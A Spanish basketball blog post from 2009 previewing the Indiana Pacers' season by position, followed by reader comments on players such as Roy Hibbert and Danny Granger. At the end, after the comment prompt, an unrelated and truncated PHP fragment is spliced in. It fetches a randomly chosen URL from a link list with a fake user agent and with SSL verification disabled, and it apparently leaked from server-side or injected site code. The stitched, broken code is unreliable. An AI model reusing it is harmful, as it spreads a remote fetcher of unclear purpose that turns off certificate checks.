Indiana Pacers: No hay prisa

19 de October de 2009 por Viva_Dirk

Los Indiana Pacers llevan las 3 últimas campañas ganando 35, 36 y 36 partidos en la regular season, lo que les deja claramente fuera de play-offs y con poquísimas posibilidades de elegir un top-5 del draft. Esto hace de ellos una rara avis, ya que en la actual NBA el que no piensa entrar en play-offs, piensa en elegir con un buen pick o en hacer hueco para una estrella, cosa que tampoco tienen muy cercana los Pacers. No parece que nada de esto vaya a cambiar en esta temporada, aunque de nuevo serán un hueso duro de roer y tienen piezas que pueden darles ese salto que necesitan.

TJ Ford sigue como base titular, rápido como pocos, buen anotador y perfecto para el contraataque. Tiene sus puntos negros en el juego estático y es irregular en el tiro pero sería el base titular de muchos equipos NBA. Earl Watson parece presentarse como su recambio. El ex de Oklahoma tuvo muy buenos momentos la campaña pasada y es un buen recambio para TJ. AJ Price, uno de los líderes de UConn,  similar a Ford aunque algo más cerebral y menos veloz, llega desde la 2ª ronda del draft dispuesto a ganarse el puesto de tercer base en detrimento de Travis Diener.

En el puesto de escolta veremos de inicio a Brandon Rush que se encuentra ante su gran oportunidad con la baja de Mike Dunleavy, que debería volver a estar disponible a mediados de noviembre. Rush es un jugador muy fuerte físicamente pero más lento que la mayoría de escoltas, con tiro exterior consistente y un buen juego en el poste. En defensa tiene un desplazamiento lateral lento pero puede defender indistintamente a escoltas y aleros. Mike Dunleavy solo recuperaría la titularidad tras su recuperación si las cosas no marchan bien en el equipo. Con 2.05 de estatura derrocha clase a raudales y antes de las lesiones era uno de los mejores point forwards de la liga, perdiéndose sólo 11 partidos en 4 años. Si vuelve a su máximo nivel los Pacers pueden pelear los play-offs.

Danny Granger se ha ganado el contrato que ha firmado. El año pasado se destapó como uno de los aleros más completos de la liga, capaz de anotar 182 triples y poner 97 tapones con números de jugador franquicia aunque parece haber alcanzado su tope. Subir otro escalón le situaría junto a los mas grandes de la competición. Con Dunleavy alternando las posiciones de escolta y alero, Danthay Jones, que llega con la vitola de buen defensor, será el 4ºjugador en la rotación exterior. Luther Head tendrá minutos testimoniales.

El juego interior también tiene un poco de todo. Troy Murphy viene de hacer una campaña espectacular: 14.3 puntos y 11.8 rebotes con un soberbio 45% en triples. Si el resto de mantiene sano y el mantiene ese nivel, los Pacers se encontrarán aún más cerca de play-offs. En el puesto de Center encontramos la clave para que los Pacers sean candidatos a jugar la post temporada: Roy Hibbert dejó muy buenas sensaciones en su año rookie y va a tener este año oportunidad de confirmarlas. Un pívot de 2.21 con buenos movimientos en el poste, un porcentaje decente en tiros libres y a la vez buen intimidador no es algo que abunde en la liga. En el banco dos guerreros de la pintura, todo un veteranazo como Jeff Foster y el rookie Tyler Hansbrough, que ha sido comparado con el mismo Foster. Psycho-T, más atlético y con mejor mano de media distancia, es un novato preparado para rendir desde el primer momento.

Quinteto: Ford-Rush-Granger-Murphy-Hibbert

6º hombre: Mike Dunleavy

Pronóstico: Peleando por play-offs

Comenta

11 comentarios a esta entrada

  1. sergio dice:
    #1

    Y Danthay Jones compartiendo minutos de escolta?? Seria una pena apostar por un jugador titular el año pasado en un equipo como Denver para destinarlo a sustituir a Granger, la figura del equipo… Y tampoco creo que Granger haya llegado a su tope. Demasiado joven como para decirlo. Si bien creo que ciertos conceptos como el juego de espaldas, la distribucion de juego y el liderazgo le pueden quedar algo grandes, creo que es un anotador compulsivo y, por calidad, no demasiado lejos de jugadores como Durant, el mejor V.Carter o McGrady…

      Citar

  2. the choosen one dice:
    #2

    McGrady son palabras mayores…

      Citar

  3. Viva_Dirk dice:
    #3

    Hombre, creo que para que Granger llegue a esos niveles tiene que subir su número de asistencias considerablemente, sin bajar en el resto de facetas. Si puede ser comparable su juego al de Durant, aunque a Kevin se le ve mas recorrido.

    En cuanto a D.Jones, me habré expresado mal pero creo que va a jugar tanto de escolta como de alero, pero que va a ser el 4º alero de la rotación.

      Citar

  4. Óscar dice:
    #4

    En la megaporra no aparecen los Pacers como equipo de Playoff y a lo mejor nos equivocamos (yo el primero que meto p.ej. de 8º a Charlotte…).
    Yo creo que si no cambian en algo el concepto de juego, la de intercambiar golpes con sus rivales e irse a anotaciones altas retando al rival a que les supere si pueden en anotación, se quedarán de nuevo con esas 35/36 victorias. O’Brien tiene su estilo, las ideas claras, pero si vas a tener a gente interior como Foster, Hansbrough, Solomon Jones, Hibbert o McRoberts, puedes plantear partidos determinados de forma más física, con más control. La llegada de los Jones o Hansbrough no es suficiente para mejorar ese aspecto si no conlleva el matiz de poder revisar tu idea básica contra determinados equipos. Sobre todo, cuando tu Conferencia es la Este.
    Aparte de eso, los jugadores que tienen que asumir el liderazgo tienen que dar un paso adelante, no en cuanto a números sino a la hora de ser de verdad decisivos y lograr que el equipo sea más fuerte. Me refiero a Granger y a Murphy, los dos mejor pagados del plantel, y no por casualidad.
    También fundamental va a ser que cuando regrese Dunleavy vuelva a recuperar su mejor nivel, sobre todo por la baja de Marquis Daniels. Y que los dos rookies del año pasado, Roy Hibbert y Brandon Rush, progresen y confirmen todo lo que apuntan. El gigante de Georgetown podría estar entre los aspirantes a MIP. Ojalá.

      Citar

  5. kantonyo dice:
    #5

    Que buena pinta tiene Roy Hibbert … Y pensar que Toronto lo cedió a Indiana en el traspaso de Jermaine.

    Será mi estimulo para seguir a los Pacers este año.

      Citar

  6. Jabho dice:
    #6

    No son un mal equipo y serían mejores si tuvieran una referencia en la pintura,… Murphy además de no pisar mucho la pintura dudo que repita la temporada anterior.

    Lo dicho, es un equipo que con un interior solvente sería de Play Off seguro. Aun sin el anadarna cerca de las 40 victorias…

      Citar

  7. kantonyo dice:
    #7

    Pues yo el interior con Hibbert y Murphy lo veo bastante bien, ademas de Foster y Hansbrough como suplentes…. pocas franquicias del Este tienen este armamento debajo del tablero …

    en cambio opino lo contrario con su juego exterior con Tj ford, Brandon Rush en el quinteto inicial, se me antoja muy pobre y más ahora con la baja de Marquis Daniels y Jarret Jack.

      Citar

  8. aro_pasado_no_newtoniano dice:
    #8

    Hibbert, no es malo, y tiene buena manita, pero yo lo veo un poco como el jefe de “Alguien voló sobre el nido del cuco”.

      Citar

  9. aro_pasado_no_newtoniano dice:
    #9

    Eso, sí demasiado tiempo en tierra de nadie, esperando que caiga el maná. Y parece que no cae.

      Citar

  10. Kki dice:
    #10

    El personaje ese de “Alguien voló..” era aquel indio, que no hablaba… le llamaban “Montaña”, no?
    Qué grande, y sobre todo Nicholson… Peliculón.

      Citar

  11. L.Casei dice:
    #11

    Ojalá veamos a un gran “montaña” Hibbert. Tiene que jugar un pelín más duro desde el principio para hacerse respetar, pero potencial tiene de sobra, puede ser dominante (sobre todo en su zona) y aspirante a ese premio de jugador con más progresión del año. Ha tenido varios partidos en esta pretemporada de 6/7 tapones y cerca de 15 rebotes. En ataque tiene que ser listo, no es tan tosco técnicamente. tiene que meter más canastas “para abajo”. A veces me recuerda a un San Bernardo… necesita enfadarse (o que le enfaden)para que reaccione, un poco al estilo Greg Oden.
    Roy Hibbert (aún 22 años) es uno más de la mejor escuela de “Centers” que ha alimentado a la NBA en las últimas décadas: la Universidad de Georgetown, con John Thompson padre, y en menor medida, hijo (John Thompson III). Continúa una estirpe de grandes pívots salidos de los “Hoyas”, como Patrick Ewing, Alonzo Mourning o Dikembe Mutombo.
    La última “joya” en ese puesto, el esta temporada “sophomore”, Greg Monroe (2,11), que estará si no pasa nada raro entre los primeros del Draft 2010.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>